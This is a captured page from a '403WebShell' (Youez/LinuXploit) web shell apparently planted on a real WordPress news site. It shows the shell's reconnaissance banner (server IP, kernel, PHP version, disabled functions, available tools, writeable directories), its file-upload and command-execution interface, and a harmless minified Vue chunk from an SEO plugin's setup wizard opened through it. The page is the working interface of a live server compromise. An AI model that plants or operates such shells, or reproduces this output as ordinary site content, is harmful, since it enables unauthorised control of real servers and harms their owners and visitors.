AVRIL_START_JANCOKALIVEAVRIL_END_JANCOK Interactive Terminal

Command Executor


Warning: chmod(): Operation not permitted in /www/wwwroot/dzynews.com/wp-content/plugins/fileorganizer/fileorganizer.php on line 8
403WebShell
403Webshell
Server IP : dzynews.com  /  Your IP : 216.73.217.105
Web Server : nginx/1.30.3
System : Linux cloud-tdkldl-avd6 5.15.0-91-generic #101-Ubuntu SMP Tue Nov 14 13:30:08 UTC 2023 x86_64
User : www ( 1000)
PHP Version : 8.2.31
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/dzynews.com/wp-content/plugins/smart-seo-tool/tpl/assets/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/wwwroot/dzynews.com/wp-content/plugins/smart-seo-tool/tpl/assets/js/chunk-2d0afaa7.4b00fabb.js
(window["webpackJsonp"]=window["webpackJsonp"]||[]).push([["chunk-2d0afaa7"],{"0efb":function(e,t,a){"use strict";a.r(t);var s=function(){var e=this,t=e._self._c;return t("div",{staticClass:"steps-card-box"},[t("div",{staticClass:"wbs-main"},[t("div",{staticClass:"step-desc"},[e._v(" 可根据实际情况设置网站允许搜索引擎编入索引的内容类型。如不确定,使用默认设置即可。sitemap也基于此生成。 ")]),t("div",{staticClass:"option-items-selector"},[t("div",{staticClass:"select-item"},[e._v(' 允许搜索引擎索引"文章"类型URL: '),t("el-switch",{attrs:{"active-value":!0,"inactive-value":!1},model:{value:e.seoIndexCnf.post,callback:function(t){e.$set(e.seoIndexCnf,"post",t)},expression:"seoIndexCnf.post"}})],1),t("div",{staticClass:"select-item"},[e._v(' 允许搜索引擎索引"页面"类型URL: '),t("el-switch",{attrs:{"active-value":!0,"inactive-value":!1},model:{value:e.seoIndexCnf.page,callback:function(t){e.$set(e.seoIndexCnf,"page",t)},expression:"seoIndexCnf.page"}})],1),t("div",{staticClass:"select-item"},[e._v(' 允许搜索引擎索引"分类目录"类型URL: '),t("el-switch",{attrs:{"active-value":!0,"inactive-value":!1},model:{value:e.seoIndexCnf.category,callback:function(t){e.$set(e.seoIndexCnf,"category",t)},expression:"seoIndexCnf.category"}})],1),t("div",{staticClass:"select-item"},[e._v(' 允许搜索引擎索引"标签"类型URL: '),t("el-switch",{attrs:{"active-value":!0,"inactive-value":!1},model:{value:e.seoIndexCnf.tag,callback:function(t){e.$set(e.seoIndexCnf,"tag",t)},expression:"seoIndexCnf.tag"}})],1),t("div",{staticClass:"select-item"},[e._v(' 允许搜索引擎索引"搜索结果"类型URL: '),t("el-switch",{attrs:{"active-value":!0,"inactive-value":!1},model:{value:e.seoIndexCnf.search,callback:function(t){e.$set(e.seoIndexCnf,"search",t)},expression:"seoIndexCnf.search"}})],1),t("div",{staticClass:"select-item"},[e._v(' 允许搜索引擎索引"作者"类型URL: '),t("el-switch",{attrs:{"active-value":!0,"inactive-value":!1},model:{value:e.seoIndexCnf.author,callback:function(t){e.$set(e.seoIndexCnf,"author",t)},expression:"seoIndexCnf.author"}})],1)])]),t("div",{staticClass:"steps-card-ft"},[t("div",{staticClass:"scft-item primary"},[t("el-button",{attrs:{size:"small"},on:{click:e.prev}},[t("i",{staticClass:"el-icon-arrow-left"}),e._v(" 上一步")])],1),t("div",{staticClass:"scft-item"},[t("el-button",{attrs:{type:"primary",size:"small"},on:{click:e.updateData}},[e._v("下一步 "),t("i",{staticClass:"el-icon-arrow-right"})])],1)])])},n=[],i={name:"GuideStep4",data(){const e=this;return{formChanged:1,isLoaded:!1,is_pro:e.$cnf.is_pro,opt:{},cnf:{},seoIndexCnf:{post:!1,page:!1,category:!1,tag:!1,search:!1,author:!1}}},created(){const e=this;e.getData()},methods:{getData(){const e=this;e.$api.getData({action:e.$cnf.action.act,op:"get_guide"}).then(t=>{e.opt=t["data"];const a=t.data.seo_index||[];a.forEach(t=>{e.seoIndexCnf[t]=!0}),e.isLoaded=!0})},updateData(e){const t=this;t.opt.step=4,t.$api.saveData({_ajax_nonce:_wb_sst_ajax_nonce||"",action:t.$cnf.action.act,op:"set_guide",opt:t.opt}).then(a=>{t.formChanged=1,t.$emit("next",!0),"function"==typeof e&&e&&e()})},prev(){this.$emit("prev",!0)}},watch:{opt:{handler(){this.formChanged++},deep:!0},seoIndexCnf:{handler(e){let t=[];for(let a in e)e[a]&&t.push(a);this.opt.seo_index=t},deep:!0}},beforeRouteLeave(e,t,a){const s=this;s.formChanged>1?s.$wbui.open({content:"您修改的设置尚未保存,确定离开此页面吗?",btn:["保存并离开","放弃修改"],yes(){return a(!1),s.updateData(()=>{a()}),!1},no(){return a(),!1}}):a()}},o=i,c=a("2877"),l=Object(c["a"])(o,s,n,!1,null,null,null);t["default"]=l.exports}}]);

Youez - 2016 - github.com/yon3zu
LinuXploit